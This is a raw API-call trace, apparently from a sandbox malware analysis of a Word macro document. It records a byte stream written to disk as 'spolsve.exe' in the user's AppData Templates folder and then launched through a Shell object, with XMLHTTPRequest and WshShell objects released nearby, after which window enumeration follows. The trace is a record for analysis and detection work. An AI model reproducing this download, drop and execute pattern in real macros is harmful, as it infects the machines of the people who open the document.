rclsid=0x33e4fb60f0*(Data1=0x566, Data2=0x0, Data3=0x10, Data4=([0]=0x80, [1]=0x0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x6d, [6]=0x2e, [7]=0xa4)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x7ffce0bbe8c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33e4fb5f98 | out: ppv=0x33e4fb5f98*=0x1d39dc75da0) returned 0x0 [0064.188] Stream:IUnknown:QueryInterface (in: This=0x1d39dc75da0, riid=0x7ffce0bd5eb0*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x33e4fb5fb0 | out: ppvObject=0x33e4fb5fb0*=0x0) returned 0x80004002 [0064.189] Stream:IUnknown:QueryInterface (in: This=0x1d39dc75da0, riid=0x7ffce0bd5ec0*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, [7]=0x51)), ppvObject=0x33e4fb5fb8 | out: ppvObject=0x33e4fb5fb8*=0x0) returned 0x80004002 [0064.189] Stream:IUnknown:QueryInterface (in: This=0x1d39dc75da0, riid=0x7ffce0bbb860*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb5fd8 | out: ppvObject=0x33e4fb5fd8*=0x1d39dc75da0) returned 0x0 [0064.190] Stream:IUnknown:Release (This=0x1d39dc75da0) returned 0x1 [0064.190] Stream:IDispatch:GetIDsOfNames (in: This=0x1d39dc75da0, riid=0x7ffce0bc3868*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33e4fb6160*="Open", cNames=0x1, lcid=0x1d300000409, rgDispId=0x33e4fb6144 | out: rgDispId=0x33e4fb6144*=10) returned 0x0 [0064.191] Stream:IDispatch:Invoke (in: This=0x1d39dc75da0, dispIdMember=10, riid=0x7ffce0bc3868*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x33e4fb60f8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x33e4fb6110, puArgErr=0x33e4fb60f0 | out: pDispParams=0x33e4fb60f8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x33e4fb6110*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33e4fb60f0*=0xe4fb6144) returned 0x0 [0064.193] Stream:IDispatch:GetIDsOfNames (in: This=0x1d39dc75da0, riid=0x7ffce0bc3868*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33e4fb60c0*="Type", cNames=0x1, lcid=0x1d300000409, rgDispId=0x33e4fb60a4 | out: rgDispId=0x33e4fb60a4*=4) returned 0x0 [0064.193] Stream:IDispatch:Invoke (in: This=0x1d39dc75da0, dispIdMember=4, riid=0x7ffce0bc3868*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x4, pDispParams=0x33e4fb5ff8*(rgvarg=([0]=0x1d39d7a5d88*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d39dbc0001, varVal2=0x0)), rgdispidNamedArgs=([0]=0x33e4fb60a4*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x33e4fb6010, puArgErr=0x33e4fb5ff0 | out: pDispParams=0x33e4fb5ff8*(rgvarg=([0]=0x1d39d7a5d88*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d39dbc0001, varVal2=0x0)), rgdispidNamedArgs=([0]=0x33e4fb60a4*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x33e4fb6010*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33e4fb5ff0*=0xe4fb6200) returned 0x0 [0064.194] Stream:IDispatch:GetIDsOfNames (in: This=0x1d39dc75da0, riid=0x7ffce0bc3868*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33e4fb6160*="Write", cNames=0x1, lcid=0x1d300000409, rgDispId=0x33e4fb6144 | out: rgDispId=0x33e4fb6144*=13) returned 0x0 [0064.194] Stream:IDispatch:Invoke (in: This=0x1d39dc75da0, dispIdMember=13, riid=0x7ffce0bc3868*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x33e4fb60f8*(rgvarg=([0]=0x1d39d7a5d88*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d39d7a64d0*(varType=0x2011, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d39e1cad30*(cDims=0x1, fFeatures=0x2080, cbElements=0x1, cLocks=0x0, pvData=0x1d39e1cad50*, rgsabound=((cElements=0x47000, lLbound=0))), varVal2=0x0), varVal2=0x1d39d7a64d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x33e4fb6110, puArgErr=0x33e4fb60f0 | out: pDispParams=0x33e4fb60f8*(rgvarg=([0]=0x1d39d7a5d88*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d39d7a64d0*(varType=0x2011, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d39e1cad30*(cDims=0x1, fFeatures=0x2080, cbElements=0x1, cLocks=0x0, pvData=0x1d39e1cad50*, rgsabound=((cElements=0x47000, lLbound=0))), varVal2=0x0), varVal2=0x1d39d7a64d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x33e4fb6110*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33e4fb60f0*=0xe4fb6144) returned 0x0 [0064.196] Stream:IDispatch:GetIDsOfNames (in: This=0x1d39dc75da0, riid=0x7ffce0bc3868*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33e4fb6160*="SaveToFile", cNames=0x1, lcid=0x409, rgDispId=0x33e4fb6144 | out: rgDispId=0x33e4fb6144*=17) returned 0x0 [0064.196] Stream:IDispatch:Invoke (in: This=0x1d39dc75da0, dispIdMember=17, riid=0x7ffce0bc3868*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x33e4fb60f8*(rgvarg=([0]=0x1d39d7a5d70*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), [1]=0x1d39d7a5d88*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d39d7a64a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\spolsve.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\templates\\spolsve.exe"), varVal2=0x0), varVal2=0x1d39d7a64a0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x33e4fb6110, puArgErr=0x33e4fb60f0 | out: pDispParams=0x33e4fb60f8*(rgvarg=([0]=0x1d39d7a5d70*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), [1]=0x1d39d7a5d88*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d39d7a64a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\spolsve.exe", varVal2=0x0), varVal2=0x1d39d7a64a0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x33e4fb6110*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33e4fb60f0*=0xe4fb6144) returned 0x0 [0064.331] Stream:IDispatch:GetIDsOfNames (in: This=0x1d39dc75da0, riid=0x7ffce0bc3868*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33e4fb6160*="Close", cNames=0x1, lcid=0x409, rgDispId=0x33e4fb6144 | out: rgDispId=0x33e4fb6144*=11) returned 0x0 [0064.331] Stream:IDispatch:Invoke (in: This=0x1d39dc75da0, dispIdMember=11, riid=0x7ffce0bc3868*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x33e4fb60f8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x33e4fb6110, puArgErr=0x33e4fb60f0 | out: pDispParams=0x33e4fb60f8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x33e4fb6110*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33e4fb60f0*=0xe4fb6144) returned 0x0 [0064.333] Shell:IDispatch:GetIDsOfNames (in: This=0x1d39dbefa90, riid=0x7ffce0bc3868*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33e4fb6160*="Open", cNames=0x1, lcid=0x409, rgDispId=0x33e4fb6144 | out: rgDispId=0x33e4fb6144*=1610743813) returned 0x0 [0064.342] Shell:IDispatch:Invoke (in: This=0x1d39dbefa90, dispIdMember=1610743813, riid=0x7ffce0bc3868*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x33e4fb60f8*(rgvarg=([0]=0x1d39d7a5d88*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\spolsve.exe", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x33e4fb6110, puArgErr=0x33e4fb60f0 | out: pDispParams=0x33e4fb60f8*(rgvarg=([0]=0x1d39d7a5d88*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\spolsve.exe", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x33e4fb6110*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33e4fb60f0*=0xfffffffe) returned 0x0 [0068.072] Shell:IUnknown:Release (This=0x1d39dbefa90) returned 0x0 [0068.073] Stream:IUnknown:Release (This=0x1d39dc75da0) returned 0x0 [0068.073] WshShell:IUnknown:Release (This=0x1d3972f5390) returned 0x0 [0068.074] XMLHTTPRequest:IUnknown:Release (This=0x1d39b4a5e30) returned 0x0 [0068.076] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7bf4b0) [0068.826] NtdllDefWindowProc_A (hWnd=0x60040, Msg=0xc15c, wParam=0x50, lParam=0x0) returned 0x0 [0068.829] NtdllDefWindowProc_A (hWnd=0x60040, Msg=0xc15c, wParam=0x50, lParam=0x0) returned 0x0 [0069.742] GetCapture () returned 0x0 [0069.742] GetCursorPos (in: lpPoint=0x33e4fbf4f0 | out: lpPoint=0x33e4fbf4f0*(x=470, y=293)) returned 1 [0069.743] WindowFromPoint (Point=0x125000001d6) returned 0x30342 [0069.743] GetWindowThreadProcessId (in: hWnd=0x30342, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0076.092] NtdllDefWindowProc_A (hWnd=0x60040, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0120.388] NtdllDefWindowProc_A (hWnd=0x60040, Msg=0x1c, wParam=0x0, lParam=0x7b0) returned 0x0 [0121.217] NtdllDefWindowProc_A (hWnd=0x60040, Msg=0x1c, wParam=0x1, lParam=0x7b0) returned 0x0 [0133.294] NtdllDefWindowProc_A (hWnd=0x60040, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0231.693] GetCurrentThreadId () returned 0x1378 [0231.693] GetWindowLongA (hWnd=0x0, nIndex=-16) returned 0 [0231.694] GetDesktopWindow () returned 0x10010 [0231.694] GetWindow (hWnd=0x10010, uCmd=0x5) returned 0x10176 [0231.694] GetClassNameA (in: hWnd=0x10176, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="ForegroundStaging") returned 17 [0231.694] lstrcmpA (lpString1="ForegroundStaging", lpString2="ThunderRT6Main") returned -1 [0231.694] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xacc [0231.694] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10178 [0231.694] GetClassNameA (in: hWnd=0x10178, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.694] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.694] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xacc [0231.694] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x10142 [0231.694] GetClassNameA (in: hWnd=0x10142, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="ForegroundStaging") returned 17 [0231.694] lstrcmpA (lpString1="ForegroundStaging", lpString2="ThunderRT6Main") returned -1 [0231.694] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9e0 [0231.694] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x100e6 [0231.694] GetClassNameA (in: hWnd=0x100e6, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0231.694] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0231.694] GetWindowThreadProcessId (in: hWnd=0x100e6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0231.694] GetWindow (hWnd=0x100e6, uCmd=0x2) returned 0x100e2 [0231.694] GetClassNameA (in: hWnd=0x100e2, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0231.694] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0231.694] GetWindowThreadProcessId (in: hWnd=0x100e2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0231.694] GetWindow (hWnd=0x100e2, uCmd=0x2) returned 0x100dc [0231.694] GetClassNameA (in: hWnd=0x100dc, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0231.694] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0231.694] GetWindowThreadProcessId (in: hWnd=0x100dc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0231.694] GetWindow (hWnd=0x100dc, uCmd=0x2) returned 0x100d8 [0231.694] GetClassNameA (in: hWnd=0x100d8, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0231.694] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0231.694] GetWindowThreadProcessId (in: hWnd=0x100d8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0231.694] GetWindow (hWnd=0x100d8, uCmd=0x2) returned 0x100c0 [0231.695] GetClassNameA (in: hWnd=0x100c0, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0231.695] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0231.695] GetWindowThreadProcessId (in: hWnd=0x100c0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0231.695] GetWindow (hWnd=0x100c0, uCmd=0x2) returned 0x100b8 [0231.695] GetClassNameA (in: hWnd=0x100b8, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0231.695] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0231.695] GetWindowThreadProcessId (in: hWnd=0x100b8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0231.695] GetWindow (hWnd=0x100b8, uCmd=0x2) returned 0x100a8 [0231.695] GetClassNameA (in: hWnd=0x100a8, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0231.695] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0231.695] GetWindowThreadProcessId (in: hWnd=0x100a8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0231.695] GetWindow (hWnd=0x100a8, uCmd=0x2) returned 0x102fc [0231.695] GetClassNameA (in: hWnd=0x102fc, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="HardwareMonitorWindowClass") returned 26 [0231.695] lstrcmpA (lpString1="HardwareMonitorWindowClass", lpString2="ThunderRT6Main") returned -1 [0231.695] GetWindowThreadProcessId (in: hWnd=0x102fc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0231.695] GetWindowLongA (hWnd=0x102fc, nIndex=-16) returned -2080374784 [0231.695] GetWindowLongPtrA (hWnd=0x102fc, nIndex=-6) returned 0x0 [0231.695] GetWindowLongPtrA (hWnd=0x102fc, nIndex=-6) returned 0x0 [0231.695] GetWindow (hWnd=0x102fc, uCmd=0x2) returned 0x10106 [0231.695] GetClassNameA (in: hWnd=0x10106, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="MSCTFIME UI") returned 11 [0231.695] lstrcmpA (lpString1="MSCTFIME UI", lpString2="ThunderRT6Main") returned -1 [0231.695] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0231.695] GetWindow (hWnd=0x10106, uCmd=0x2) returned 0x100a2 [0231.695] GetClassNameA (in: hWnd=0x100a2, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.695] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.695] GetWindowThreadProcessId (in: hWnd=0x100a2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0231.695] GetWindow (hWnd=0x100a2, uCmd=0x2) returned 0x10100 [0231.695] GetClassNameA (in: hWnd=0x10100, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0231.695] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0231.695] GetWindowThreadProcessId (in: hWnd=0x10100, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0231.695] GetWindow (hWnd=0x10100, uCmd=0x2) returned 0x100f4 [0231.695] GetClassNameA (in: hWnd=0x100f4, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0231.695] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0231.696] GetWindowThreadProcessId (in: hWnd=0x100f4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0231.696] GetWindow (hWnd=0x100f4, uCmd=0x2) returned 0x100f8 [0231.696] GetClassNameA (in: hWnd=0x100f8, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0231.696] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0231.696] GetWindowThreadProcessId (in: hWnd=0x100f8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0231.696] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x100a0 [0231.696] GetClassNameA (in: hWnd=0x100a0, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="Shell_TrayWnd") returned 13 [0231.696] lstrcmpA (lpString1="Shell_TrayWnd", lpString2="ThunderRT6Main") returned -1 [0231.696] GetWindowThreadProcessId (in: hWnd=0x100a0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0231.696] GetWindow (hWnd=0x100a0, uCmd=0x2) returned 0x1021e [0231.696] GetClassNameA (in: hWnd=0x1021e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="ATL:00007FFCEDC97230") returned 20 [0231.696] lstrcmpA (lpString1="ATL:00007FFCEDC97230", lpString2="ThunderRT6Main") returned -1 [0231.696] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd38 [0231.696] GetWindow (hWnd=0x1021e, uCmd=0x2) returned 0x10114 [0231.696] GetClassNameA (in: hWnd=0x10114, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0231.696] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0231.696] GetWindowThreadProcessId (in: hWnd=0x10114, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7e4 [0231.696] GetWindow (hWnd=0x10114, uCmd=0x2) returned 0x10102 [0231.696] GetClassNameA (in: hWnd=0x10102, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0231.696] lstrcmpA (lpString1="TaskListThumbnailWnd", lpString2="ThunderRT6Main") returned -1 [0231.696] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7f0 [0231.696] GetWindow (hWnd=0x10102, uCmd=0x2) returned 0x1102e2 [0231.696] GetClassNameA (in: hWnd=0x1102e2, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="NUIDialog") returned 9 [0231.696] lstrcmpA (lpString1="NUIDialog", lpString2="ThunderRT6Main") returned -1 [0231.696] GetWindowThreadProcessId (in: hWnd=0x1102e2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0231.696] GetWindowLongA (hWnd=0x1102e2, nIndex=-16) returned -2067267584 [0231.696] GetWindowLongPtrA (hWnd=0x1102e2, nIndex=-6) returned 0x7ffce4f80000 [0231.696] GetWindowLongPtrA (hWnd=0x1102e2, nIndex=-6) returned 0x7ffce4f80000 [0231.696] GetWindow (hWnd=0x1102e2, uCmd=0x2) returned 0x1032c [0231.696] GetClassNameA (in: hWnd=0x1032c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="MSCTFIME UI") returned 11 [0231.696] lstrcmpA (lpString1="MSCTFIME UI", lpString2="ThunderRT6Main") returned -1 [0231.696] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0231.697] GetWindowLongA (hWnd=0x1032c, nIndex=-16) returned -1946157056 [0231.697] GetWindowLongPtrA (hWnd=0x1032c, nIndex=-6) returned 0x0 [0231.697] GetWindowLongPtrA (hWnd=0x1032c, nIndex=-6) returned 0x0 [0231.697] GetWindow (hWnd=0x1032c, uCmd=0x2) returned 0x102ee [0231.697] GetClassNameA (in: hWnd=0x102ee, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.697] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.697] GetWindowThreadProcessId (in: hWnd=0x102ee, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0231.697] GetWindowLongA (hWnd=0x102ee, nIndex=-16) returned -1946157056 [0231.697] GetWindowLongPtrA (hWnd=0x102ee, nIndex=-6) returned 0x7ff688e30000 [0231.697] GetWindowLongPtrA (hWnd=0x102ee, nIndex=-6) returned 0x7ff688e30000 [0231.697] GetWindow (hWnd=0x102ee, uCmd=0x2) returned 0x10306 [0231.697] GetClassNameA (in: hWnd=0x10306, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="OpusApp") returned 7 [0231.697] lstrcmpA (lpString1="OpusApp", lpString2="ThunderRT6Main") returned -1 [0231.697] GetWindowThreadProcessId (in: hWnd=0x10306, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0231.697] GetWindowLongA (hWnd=0x10306, nIndex=-16) returned 399441920 [0231.697] GetWindowLongPtrA (hWnd=0x10306, nIndex=-6) returned 0x7ffce7990000 [0231.697] GetWindowLongPtrA (hWnd=0x10306, nIndex=-6) returned 0x7ffce7990000 [0231.697] GetWindow (hWnd=0x10306, uCmd=0x2) returned 0x70038 [0231.697] GetClassNameA (in: hWnd=0x70038, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="OpusApp") returned 7 [0231.697] lstrcmpA (lpString1="OpusApp", lpString2="ThunderRT6Main") returned -1 [0231.697] GetWindowThreadProcessId (in: hWnd=0x70038, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0231.697] GetWindowLongA (hWnd=0x70038, nIndex=-16) returned 131006464 [0231.697] GetWindowLongPtrA (hWnd=0x70038, nIndex=-6) returned 0x7ffce7990000 [0231.697] GetWindowLongPtrA (hWnd=0x70038, nIndex=-6) returned 0x7ffce7990000 [0231.697] GetWindow (hWnd=0x70038, uCmd=0x2) returned 0x60040 [0231.697] GetClassNameA (in: hWnd=0x60040, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="ThunderMain") returned 11 [0231.697] lstrcmpA (lpString1="ThunderMain", lpString2="ThunderRT6Main") returned -1 [0231.697] GetWindowThreadProcessId (in: hWnd=0x60040, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0231.697] GetWindowLongA (hWnd=0x60040, nIndex=-16) returned -2080374784 [0231.697] GetWindowLongPtrA (hWnd=0x60040, nIndex=-6) returned 0x7ffce0820000 [0231.697] IsWindowEnabled (hWnd=0x60040) returned 1 [0231.697] GetPropA (hWnd=0x60040, lpString=0xc10a) returned 0x0 [0231.697] SetPropA (hWnd=0x60040, lpString=0xc10a, hData=0x1) returned 1 [0231.697] EnableWindow (hWnd=0x60040, bEnable=0) returned 0 [0231.697] NtdllDefWindowProc_A (hWnd=0x60040, Msg=0x1f, wParam=0x0, lParam=0x0) returned 0x0 [0231.698] NtdllDefWindowProc_A (hWnd=0x60040, Msg=0xa, wParam=0x0, lParam=0x0) returned 0x0 [0231.698] GetWindow (hWnd=0x60040, uCmd=0x2) returned 0x1033c [0231.698] 